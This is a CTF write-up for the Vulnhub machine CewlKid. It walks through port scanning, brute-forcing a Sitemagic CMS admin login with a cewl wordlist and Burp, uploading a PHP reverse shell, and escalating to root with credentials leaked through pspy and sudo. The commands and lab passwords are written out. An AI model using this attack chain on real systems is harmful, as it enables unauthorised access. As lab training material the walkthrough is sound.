Vulnhub - CewlKid

You can find the machine there > CewlKid

Summary

We start by finding a sitemagic installation under port 8080 and we generate a custom wordlist using cewl. We run a brute force attack using burp and we’re in and we get shell as www-data. First privesc is easy we detect a plaintext password using pspy and privesc to root is simple because we can execute all commands as root. Let’s pwn it! :sunglasses:

Enumeration/Reconnaissance

Let’s start as always with nmap.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
$ ip=192.168.1.10
$ nmap -p- --min-rate 10000 $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-26 12:56 EEST
Nmap scan report for cewlkid.zte.com.cn (192.168.1.10)
Host is up (0.00059s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8080/tcp open  http-proxy
MAC Address: 08:00:27:46:86:F9 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.44 seconds
$ nmap -p 22,80,8080 -sC -sV -oN nmap/initial $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-26 13:00 EEST
Nmap scan report for cewlkid.zte.com.cn (192.168.1.10)
Host is up (0.00035s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8080/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-generator: Sitemagic CMS
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Welcome - about us

port 80 has nothing, let’s start the enumeration with port 8080. Once we visit it we can see SiteMagic CMS running:

The box name is “cewlkid” so we can understand easily that we have to use cewl to do brute force. Always check the box name, sometimes spoils the box content! :wink: A fast google search sitemagic default username gives us the default username “admin”. Let’s generate a wordlist now with cewl.

1
2
3
4
$ cewl http://$ip:8080/ -w wordlist.txt
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
$ wc -l wordlist.txt 
200 wordlist.txt

Shell as www-data

Let’s fire up burp suite now, i tried to do brute force with hydra but no luck i dont know why. Follow my steps:

1) Go to login page and enter random creds & capture this with burp suite & then send to intruder:

2) Now on positions tab, select attack type sniper because we have only 1 payload. Then press clear and highlight the password and press add:

3) Now we go to payloads tab and load the wordlist we generated before & press start attack:

Let it run, we have to check for anomalies in the responses. We got one! on password Letraset:

We’re in as admin:Letraset now go to Content -> Files and upload a reverse shell:

To execute it we can see the how the directories go files -> images so:

1
$ curl http://$ip:8080/files/images/shell.php
1
2
3
4
5
6
$ nc -lvp 5555
listening on [any] 5555 ...
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@cewlkid:/$ whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Shell as cewlbeans

I did lot of enumeration & i found lot of dead end privescs. Anyway i had the idea to use pspy to detect any cronjob and i found some plaintext creds for user cewlbeans:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
www-data@cewlkid:/tmp$ ./pspy64 -p -i 1000
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

..data..

2020/09/26 10:56:01 CMD: UID=0    PID=1583   | /bin/sh /root/pth-toolkit-master/pth-winexe -U cewlbeans%fondateurs //kali whoami 

And we can login now using SSH as cewlbeans:fondateurs:

1
2
3
4
5
6
$ ssh cewlbeans@$ip
cewlbeans@192.168.1.10's password: 

cewlbeans@cewlkid:~$ whoami;id
cewlbeans
uid=1004(cewlbeans) gid=1004(cewlbeans) groups=1004(cewlbeans)

Shell as root

If we check sudo -l we can see that we can execute all commands as root:

1
2
3
4
5
6
7
8
9
10
cewlbeans@cewlkid:~$ sudo -l
Matching Defaults entries for cewlbeans on cewlkid:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User cewlbeans may run the following commands on cewlkid:
    (ALL : ALL) ALL
cewlbeans@cewlkid:~$ sudo bash 
root@cewlkid:/home/cewlbeans# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)

Let’s read the flag:

Awesome :fire: